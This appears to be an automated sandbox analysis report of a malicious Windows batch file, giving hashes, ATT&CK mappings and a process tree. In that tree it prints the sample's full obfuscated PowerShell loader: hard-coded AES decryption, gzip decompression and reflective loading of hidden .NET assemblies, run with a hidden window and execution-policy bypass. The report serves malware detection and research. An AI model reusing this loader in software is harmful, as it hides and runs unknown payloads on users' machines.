3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee

General

Target

las.cmd
Size

72KB
MD5

4bfe57ca78dd1ac468e92a2307783552
SHA1

73966e6a19ba6f1ea47002ddcbc42d5ac6434b22
SHA256

3e0590e42affae14f003fe2686abb8bd9be6e2fb48f7160779d0dc0c03cdfeee
SHA512

21a0071708eaeead1ebf0cb96ab39955b6ced797c0b9e25005c5c8ae4659f2ef842de42572f15fa02eb91df82eb5ba82b1b0d06d09d908d835f039f23fca4572
SSDEEP

1536:W4s6PYSYp0q0tIlQ2baGAIbsIpcEj/Bi81w2yfmfV2fymv:46PHY2glQ2nAIQUcY91Fj2fyi

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2724 powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

2724 powershell.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2724 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2724 powershell.exe

pid	process
2724	powershell.exe

pid	process
2724	powershell.exe

pid	process
2724	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2724	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 108 wrote to memory of 1940	108	cmd.exe	cmd.exe
PID 108 wrote to memory of 1940	108	cmd.exe	cmd.exe
PID 108 wrote to memory of 1940	108	cmd.exe	cmd.exe
PID 108 wrote to memory of 1972	108	cmd.exe	cmd.exe
PID 108 wrote to memory of 1972	108	cmd.exe	cmd.exe
PID 108 wrote to memory of 1972	108	cmd.exe	cmd.exe
PID 1972 wrote to memory of 2056	1972	cmd.exe	cmd.exe
PID 1972 wrote to memory of 2056	1972	cmd.exe	cmd.exe
PID 1972 wrote to memory of 2056	1972	cmd.exe	cmd.exe
PID 1972 wrote to memory of 2976	1972	cmd.exe	cmd.exe
PID 1972 wrote to memory of 2976	1972	cmd.exe	cmd.exe
PID 1972 wrote to memory of 2976	1972	cmd.exe	cmd.exe
PID 1972 wrote to memory of 2724	1972	cmd.exe	powershell.exe
PID 1972 wrote to memory of 2724	1972	cmd.exe	powershell.exe
PID 1972 wrote to memory of 2724	1972	cmd.exe	powershell.exe
PID 1972 wrote to memory of 2724	1972	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\las.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:108
- C:\Windows\system32\cmd.exe
  cmd /c \"set __=^&rem\
  2⤵
  PID:1940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\las.cmd
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1972
- - C:\Windows\system32\cmd.exe
    cmd /c \"set __=^&rem\
    3⤵
    PID:2056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\las.cmd';$jnWG='CopWZSmyTWZSmoWZSm'.Replace('WZSm', ''),'InlhpUvolhpUklhpUelhpU'.Replace('lhpU', ''),'CZIKWreaZIKWtZIKWeDeZIKWcZIKWryZIKWptoZIKWrZIKW'.Replace('ZIKW', ''),'ElzVbdemzVbdenzVbdtAzVbdtzVbd'.Replace('zVbd', ''),'ChayteonyteogeyteoEyteoxtyteoenyteosyteoionyteo'.Replace('yteo', ''),'ReplQraplQrdplQrLinplQresplQr'.Replace('plQr', ''),'EnRototRotorRotoyPRotooRotointRoto'.Replace('Roto', ''),'DecjqJxomjqJxpjqJxrjqJxesjqJxsjqJx'.Replace('jqJx', ''),'GeIEVqtCuIEVqrIEVqreIEVqntIEVqPrIEVqoIEVqcIEVqesIEVqsIEVq'.Replace('IEVq', ''),'FroWBktmBWBktasWBkte6WBkt4StWBktrWBktiWBktngWBkt'.Replace('WBkt', ''),'SpFryoliFryotFryo'.Replace('Fryo', ''),'MaoNWYinMoNWYodoNWYuoNWYloNWYeoNWY'.Replace('oNWY', ''),'LoZooQaZooQdZooQ'.Replace('ZooQ', ''),'TkUiTrankUiTsfokUiTrmkUiTFinkUiTalkUiTBkUiTlkUiTockkUiT'.Replace('kUiT', '');powershell -w hidden;function YsezZ($hYPZV){$VWSjA=[System.Security.Cryptography.Aes]::Create();$VWSjA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VWSjA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VWSjA.Key=[System.Convert]::($jnWG[9])('dIVP+hM/q3VrHeJIleztLe7YnRJfIUHX64EccbDbOY4=');$VWSjA.IV=[System.Convert]::($jnWG[9])('6IPeN2NKRdqw088nkuVbTg==');$BvjHr=$VWSjA.($jnWG[2])();$qFsMh=$BvjHr.($jnWG[13])($hYPZV,0,$hYPZV.Length);$BvjHr.Dispose();$VWSjA.Dispose();$qFsMh;}function ggFnh($hYPZV){$nRoYI=New-Object System.IO.MemoryStream(,$hYPZV);$BNSgW=New-Object System.IO.MemoryStream;$XVXGN=New-Object System.IO.Compression.GZipStream($nRoYI,[IO.Compression.CompressionMode]::($jnWG[7]));$XVXGN.($jnWG[0])($BNSgW);$XVXGN.Dispose();$nRoYI.Dispose();$BNSgW.Dispose();$BNSgW.ToArray();}$ldHdk=[System.IO.File]::($jnWG[5])([Console]::Title);$AAEWQ=ggFnh (YsezZ ([Convert]::($jnWG[9])([System.Linq.Enumerable]::($jnWG[3])($ldHdk, 5).Substring(2))));$xuGEv=ggFnh (YsezZ ([Convert]::($jnWG[9])([System.Linq.Enumerable]::($jnWG[3])($ldHdk, 6).Substring(2))));[System.Reflection.Assembly]::($jnWG[12])([byte[]]$xuGEv).($jnWG[6]).($jnWG[1])($null,$null);[System.Reflection.Assembly]::($jnWG[12])([byte[]]$AAEWQ).($jnWG[6]).($jnWG[1])($null,$null); "
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -ep bypass
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2724-2-0x0000000074101000-0x0000000074102000-memory.dmp

Filesize
4KB

Download
memory/2724-3-0x0000000074100000-0x00000000746AB000-memory.dmp

Filesize
5.7MB

Download
memory/2724-4-0x0000000074100000-0x00000000746AB000-memory.dmp

Filesize
5.7MB

Download
memory/2724-5-0x0000000074100000-0x00000000746AB000-memory.dmp

Filesize
5.7MB

Download
memory/2724-6-0x0000000074100000-0x00000000746AB000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing